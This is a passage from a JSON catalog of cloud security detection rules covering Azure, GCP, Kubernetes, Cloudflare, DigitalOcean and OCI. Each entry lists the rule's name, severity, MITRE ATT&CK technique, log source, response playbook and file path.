A public API server FQDN is the AKS default (private clusters are opt-in), so expect volume; this is most useful scoped to clusters that were previously private or that have no authorized IP ranges configured. Review the one documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "cloud", "mitre_techniques": [ "T1133" ], "log_source": "azure", "playbook": "tpl-initial-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/azure-aks-cluster-public-fqdn.yaml" }, { "id": "det-cloud-132", "type": "detection", "name": "Azure AKS Cluster RBAC Disabled", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'Azure AKS Cluster RBAC Disabled'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "cloud", "mitre_techniques": [ "T1556" ], "log_source": "azure", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/azure-aks-rbac-disabled.yaml" }, { "id": "det-cloud-133", "type": "detection", "name": "Azure VM RunCommand Invoked", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'Azure VM RunCommand Invoked'. RunCommand executes with local administrator (root or SYSTEM) rights inside the guest, and the Activity Log records the operation but not the script body; correlate with endpoint telemetry on the target VM to recover what ran. Review the one documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "cloud", "mitre_techniques": [ "T1059" ], "log_source": "azure", "playbook": "tpl-execution", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/azure-vm-runcommand.yaml" }, { "id": "det-cloud-134", "type": "detection", "name": "Azure VM CustomScript Extension Installed", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'Azure VM CustomScript Extension Installed'. 
Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "cloud", "mitre_techniques": [ "T1059" ], "log_source": "azure", "playbook": "tpl-execution", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/azure-vm-extension-customscript.yaml" }, { "id": "det-cloud-135", "type": "detection", "name": "Azure VM Disk Encryption Disabled", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'Azure VM Disk Encryption Disabled'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "cloud", "mitre_techniques": [ "T1485" ], "log_source": "azure", "playbook": "tpl-impact", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/azure-vm-disk-encryption-disabled.yaml" }, { "id": "det-cloud-136", "type": "detection", "name": "GCP IAM Binding Adds allUsers / allAuthenticatedUsers", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'GCP IAM Binding Adds allUsers / allAuthenticatedUsers'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "cloud", "mitre_techniques": [ "T1530" ], "log_source": "gcp", "playbook": "tpl-data-exposure", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/gcp-iam-allusers-binding.yaml" }, { "id": "det-cloud-137", "type": "detection", "name": "GCP Service Account Disabled", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'GCP Service Account Disabled'. 
Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "cloud", "mitre_techniques": [ "T1531" ], "log_source": "gcp", "playbook": "tpl-impact", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/gcp-iam-service-account-disable.yaml" }, { "id": "det-cloud-138", "type": "detection", "name": "GCP iam.serviceAccountUser Grant", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'GCP iam.serviceAccountUser Grant'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "cloud", "mitre_techniques": [ "T1078.004" ], "log_source": "gcp", "playbook": "tpl-privilege-escalation", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/gcp-iam-service-account-actas-grant.yaml" }, { "id": "det-cloud-139", "type": "detection", "name": "GCP iam.serviceAccountTokenCreator Grant", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'GCP iam.serviceAccountTokenCreator Grant'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "cloud", "mitre_techniques": [ "T1078.004" ], "log_source": "gcp", "playbook": "tpl-privilege-escalation", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/gcp-iam-token-creator-grant.yaml" }, { "id": "det-cloud-140", "type": "detection", "name": "GCP roles/billing.admin Granted", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'GCP roles/billing.admin Granted'. 
Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "cloud", "mitre_techniques": [ "T1098" ], "log_source": "gcp", "playbook": "tpl-privilege-escalation", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/gcp-iam-billing-admin-grant.yaml" }, { "id": "det-cloud-141", "type": "detection", "name": "GCP Organization Policy Constraint Disabled", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'GCP Organization Policy Constraint Disabled'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "cloud", "mitre_techniques": [ "T1562.001" ], "log_source": "gcp", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/gcp-iam-org-policy-disabled.yaml" }, { "id": "det-cloud-142", "type": "detection", "name": "GCP Service Account Key Burst", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'GCP Service Account Key Burst'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "cloud", "mitre_techniques": [ "T1098.001" ], "log_source": "gcp", "playbook": "tpl-persistence", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/gcp-iam-service-account-key-mass-create.yaml" }, { "id": "det-cloud-143", "type": "detection", "name": "GCP IAM Binding To External Domain", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'GCP IAM Binding To External Domain'. 
Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "cloud", "mitre_techniques": [ "T1199" ], "log_source": "gcp", "playbook": "tpl-initial-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/gcp-iam-grant-from-foreign-domain.yaml" }, { "id": "det-cloud-144", "type": "detection", "name": "GCP Service Account Impersonation Burst", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'GCP Service Account Impersonation Burst'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "cloud", "mitre_techniques": [ "T1078.004" ], "log_source": "gcp", "playbook": "tpl-credential-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/gcp-iam-impersonation-burst.yaml" }, { "id": "det-cloud-145", "type": "detection", "name": "GCP IAM Conditional Binding Removed", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'GCP IAM Conditional Binding Removed'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "cloud", "mitre_techniques": [ "T1556" ], "log_source": "gcp", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/gcp-iam-conditional-binding-removed.yaml" }, { "id": "det-cloud-146", "type": "detection", "name": "GCS Bucket IAM Granted To allUsers", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'GCS Bucket IAM Granted To allUsers'. 
Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "cloud", "mitre_techniques": [ "T1530" ], "log_source": "gcp", "playbook": "tpl-data-exposure", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/gcp-gcs-bucket-iam-allusers.yaml" }, { "id": "det-cloud-147", "type": "detection", "name": "GCS Uniform Bucket-Level Access Disabled", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'GCS Uniform Bucket-Level Access Disabled'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "cloud", "mitre_techniques": [ "T1530" ], "log_source": "gcp", "playbook": "tpl-data-exposure", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/gcp-gcs-uniform-access-disabled.yaml" }, { "id": "det-cloud-148", "type": "detection", "name": "GCS Mass Object Delete Burst", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'GCS Mass Object Delete Burst'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "cloud", "mitre_techniques": [ "T1485" ], "log_source": "gcp", "playbook": "tpl-impact", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/gcp-gcs-mass-delete.yaml" }, { "id": "det-cloud-149", "type": "detection", "name": "GCS Bucket Retention Policy Removed", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'GCS Bucket Retention Policy Removed'. 
Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "cloud", "mitre_techniques": [ "T1485" ], "log_source": "gcp", "playbook": "tpl-impact", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/gcp-gcs-bucket-retention-removed.yaml" }, { "id": "det-cloud-150", "type": "detection", "name": "GCS Object Versioning Disabled", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'GCS Object Versioning Disabled'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "cloud", "mitre_techniques": [ "T1490" ], "log_source": "gcp", "playbook": "tpl-impact", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/gcp-gcs-versioning-disabled.yaml" }, { "id": "det-cloud-151", "type": "detection", "name": "GCS Bucket CORS Wildcard Origin", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'GCS Bucket CORS Wildcard Origin'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "cloud", "mitre_techniques": [ "T1530" ], "log_source": "gcp", "playbook": "tpl-data-exposure", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/gcp-gcs-cors-wildcard.yaml" }, { "id": "det-cloud-152", "type": "detection", "name": "GKE Cluster Anonymous Auth Enabled", "description": "AiSOC v1 curated detection. 
Triggers on the cloud signal described by 'GKE Cluster Anonymous Auth Enabled'.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "cloud", "mitre_techniques": [ "T1133" ], "log_source": "gcp", "playbook": "tpl-initial-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/gcp-gke-rbac-anonymous.yaml" }, { "id": "det-cloud-153", "type": "detection", "name": "GKE Cluster Private Cluster Disabled", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'GKE Cluster Private Cluster Disabled'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "cloud", "mitre_techniques": [ "T1133" ], "log_source": "gcp", "playbook": "tpl-initial-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/gcp-gke-private-cluster-disabled.yaml" }, { "id": "det-cloud-154", "type": "detection", "name": "GKE Workload Identity Disabled", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'GKE Workload Identity Disabled'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "cloud", "mitre_techniques": [ "T1078" ], "log_source": "gcp", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/gcp-gke-workload-identity-disabled.yaml" }, { "id": "det-cloud-155", "type": "detection", "name": "GKE Shielded Nodes Disabled", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'GKE Shielded Nodes Disabled'. 
Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "cloud", "mitre_techniques": [ "T1610" ], "log_source": "gcp", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/gcp-gke-shielded-nodes-disabled.yaml" }, { "id": "det-cloud-156", "type": "detection", "name": "GKE Binary Authorization Disabled", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'GKE Binary Authorization Disabled'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "cloud", "mitre_techniques": [ "T1610" ], "log_source": "gcp", "playbook": "tpl-supply-chain", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/gcp-gke-binary-auth-disabled.yaml" }, { "id": "det-cloud-157", "type": "detection", "name": "BigQuery Dataset ACL Adds allUsers", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'BigQuery Dataset ACL Adds allUsers'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "cloud", "mitre_techniques": [ "T1530" ], "log_source": "gcp", "playbook": "tpl-data-exposure", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/gcp-bq-dataset-allusers-access.yaml" }, { "id": "det-cloud-158", "type": "detection", "name": "BigQuery Mass Export Burst", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'BigQuery Mass Export Burst'. 
Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "cloud", "mitre_techniques": [ "T1567.002" ], "log_source": "gcp", "playbook": "tpl-exfiltration", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/gcp-bq-mass-export.yaml" }, { "id": "det-cloud-159", "type": "detection", "name": "BigQuery Query Across External Project", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'BigQuery Query Across External Project'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "cloud", "mitre_techniques": [ "T1083" ], "log_source": "gcp", "playbook": "tpl-discovery", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/gcp-bq-cross-project-query.yaml" }, { "id": "det-cloud-160", "type": "detection", "name": "BigQuery Table Deleted Within 1 Hour Of Creation", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'BigQuery Table Deleted Within 1 Hour Of Creation'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "cloud", "mitre_techniques": [ "T1485" ], "log_source": "gcp", "playbook": "tpl-impact", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/gcp-bq-table-deleted-recently-created.yaml" }, { "id": "det-cloud-161", "type": "detection", "name": "BigQuery Dataset CMEK Removed", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'BigQuery Dataset CMEK Removed'. 
Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "cloud", "mitre_techniques": [ "T1485" ], "log_source": "gcp", "playbook": "tpl-impact", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/gcp-bq-cmek-removed.yaml" }, { "id": "det-cloud-162", "type": "detection", "name": "GCP Firewall Rule 0.0.0.0/0 With Any Port", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'GCP Firewall Rule 0.0.0.0/0 With Any Port'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "cloud", "mitre_techniques": [ "T1133" ], "log_source": "gcp", "playbook": "tpl-initial-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/gcp-compute-firewall-source-any-port-any.yaml" }, { "id": "det-cloud-163", "type": "detection", "name": "GCP Compute Public IP Attached To Instance", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'GCP Compute Public IP Attached To Instance'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "cloud", "mitre_techniques": [ "T1133" ], "log_source": "gcp", "playbook": "tpl-initial-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/gcp-compute-instance-public-ip-attached.yaml" }, { "id": "det-cloud-164", "type": "detection", "name": "GCP Project OS Login Disabled", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'GCP Project OS Login Disabled'. 
Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "cloud", "mitre_techniques": [ "T1556" ], "log_source": "gcp", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/gcp-compute-os-login-disabled.yaml" }, { "id": "det-cloud-165", "type": "detection", "name": "GCP Compute Shielded VM Disabled", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'GCP Compute Shielded VM Disabled'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "cloud", "mitre_techniques": [ "T1610" ], "log_source": "gcp", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/gcp-compute-shielded-vm-disabled.yaml" }, { "id": "det-cloud-166", "type": "detection", "name": "Kubernetes cluster-admin ClusterRoleBinding For Non-System Subject", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'Kubernetes cluster-admin ClusterRoleBinding For Non-System Subject'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "cloud", "mitre_techniques": [ "T1098.001" ], "log_source": "kubernetes", "playbook": "tpl-privilege-escalation", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/k8s-cluster-admin-binding-non-system.yaml" }, { "id": "det-cloud-167", "type": "detection", "name": "Kubernetes Secret Mass Get", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'Kubernetes Secret Mass Get'. 
Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "cloud", "mitre_techniques": [ "T1552.001" ], "log_source": "kubernetes", "playbook": "tpl-credential-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/k8s-secret-mass-get.yaml" }, { "id": "det-cloud-168", "type": "detection", "name": "Kubernetes pods/exec In Production Namespace", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'Kubernetes pods/exec In Production Namespace'. Watch the 2 documented false-positive cases before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "cloud", "mitre_techniques": [ "T1610" ], "log_source": "kubernetes", "playbook": "tpl-execution", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/k8s-pod-exec-prod-namespace.yaml" }, { "id": "det-cloud-169", "type": "detection", "name": "Kubernetes pods/attach In Production Namespace", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'Kubernetes pods/attach In Production Namespace'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "cloud", "mitre_techniques": [ "T1610" ], "log_source": "kubernetes", "playbook": "tpl-execution", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/k8s-pod-attach-prod-namespace.yaml" }, { "id": "det-cloud-170", "type": "detection", "name": "Kubernetes Request By system:anonymous", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'Kubernetes Request By system:anonymous'. 
Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "cloud", "mitre_techniques": [ "T1078" ], "log_source": "kubernetes", "playbook": "tpl-initial-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/k8s-anonymous-system-unauth.yaml" }, { "id": "det-cloud-171", "type": "detection", "name": "Kubernetes Role Created With Wildcard Verb", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'Kubernetes Role Created With Wildcard Verb'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "cloud", "mitre_techniques": [ "T1078" ], "log_source": "kubernetes", "playbook": "tpl-privilege-escalation", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/k8s-rbac-wildcard-verb.yaml" }, { "id": "det-cloud-172", "type": "detection", "name": "Kubernetes Pod hostPID=true", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'Kubernetes Pod hostPID=true'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "cloud", "mitre_techniques": [ "T1611" ], "log_source": "kubernetes", "playbook": "tpl-privilege-escalation", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/k8s-pod-host-pid-enabled.yaml" }, { "id": "det-cloud-173", "type": "detection", "name": "Kubernetes Pod hostNetwork=true", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'Kubernetes Pod hostNetwork=true'. 
Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "cloud", "mitre_techniques": [ "T1611" ], "log_source": "kubernetes", "playbook": "tpl-privilege-escalation", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/k8s-pod-host-network-enabled.yaml" }, { "id": "det-cloud-174", "type": "detection", "name": "Kubernetes Privileged Container Created", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'Kubernetes Privileged Container Created'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "cloud", "mitre_techniques": [ "T1611" ], "log_source": "kubernetes", "playbook": "tpl-privilege-escalation", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/k8s-pod-privileged-container.yaml" }, { "id": "det-cloud-175", "type": "detection", "name": "Kubernetes ValidatingWebhookConfiguration Deleted", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'Kubernetes ValidatingWebhookConfiguration Deleted'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "cloud", "mitre_techniques": [ "T1562.001" ], "log_source": "kubernetes", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/k8s-validating-webhook-deleted.yaml" }, { "id": "det-cloud-176", "type": "detection", "name": "Kubernetes MutatingWebhookConfiguration With External Endpoint", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'Kubernetes MutatingWebhookConfiguration With External Endpoint'. 
Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "cloud", "mitre_techniques": [ "T1556" ], "log_source": "kubernetes", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/k8s-mutating-webhook-suspicious-target.yaml" }, { "id": "det-cloud-177", "type": "detection", "name": "Kubernetes Pod Default ServiceAccount Token Mount", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'Kubernetes Pod Default ServiceAccount Token Mount'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "low", "category": "cloud", "mitre_techniques": [ "T1078" ], "log_source": "kubernetes", "playbook": "tpl-credential-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/k8s-service-account-token-mount-default.yaml" }, { "id": "det-cloud-178", "type": "detection", "name": "Kubernetes Impersonate Privileged User", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'Kubernetes Impersonate Privileged User'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "cloud", "mitre_techniques": [ "T1078.001" ], "log_source": "kubernetes", "playbook": "tpl-privilege-escalation", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/k8s-impersonation-by-user.yaml" }, { "id": "det-cloud-179", "type": "detection", "name": "Kubernetes Production Namespace Deleted", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'Kubernetes Production Namespace Deleted'. 
Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "cloud", "mitre_techniques": [ "T1485" ], "log_source": "kubernetes", "playbook": "tpl-impact", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/k8s-namespace-deletion-prod.yaml" }, { "id": "det-cloud-180", "type": "detection", "name": "Kubernetes NetworkPolicy Deleted In Production", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'Kubernetes NetworkPolicy Deleted In Production'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "cloud", "mitre_techniques": [ "T1562.004" ], "log_source": "kubernetes", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/k8s-network-policy-deleted-prod.yaml" }, { "id": "det-cloud-181", "type": "detection", "name": "Cloudflare Zone Transferred Out Of Account", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'Cloudflare Zone Transferred Out Of Account'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "cloud", "mitre_techniques": [ "T1583.001" ], "log_source": "cloudflare", "playbook": "tpl-impact", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/cloud-cloudflare-zone-transfer.yaml" }, { "id": "det-cloud-182", "type": "detection", "name": "Cloudflare WAF Rule Disabled", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'Cloudflare WAF Rule Disabled'. 
Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "cloud", "mitre_techniques": [ "T1562.001" ], "log_source": "cloudflare", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/cloud-cloudflare-waf-rule-disabled.yaml" }, { "id": "det-cloud-183", "type": "detection", "name": "Cloudflare Access Policy Bypass Granted", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'Cloudflare Access Policy Bypass Granted'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "cloud", "mitre_techniques": [ "T1556" ], "log_source": "cloudflare", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/cloud-cloudflare-access-policy-bypass.yaml" }, { "id": "det-cloud-184", "type": "detection", "name": "DigitalOcean Droplet Snapshot Transferred", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'DigitalOcean Droplet Snapshot Transferred'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "cloud", "mitre_techniques": [ "T1537" ], "log_source": "digitalocean", "playbook": "tpl-exfiltration", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/cloud-do-droplet-snapshot-shared.yaml" }, { "id": "det-cloud-185", "type": "detection", "name": "OCI Tenant Administrators Group Membership Added", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'OCI Tenant Administrators Group Membership Added'. 
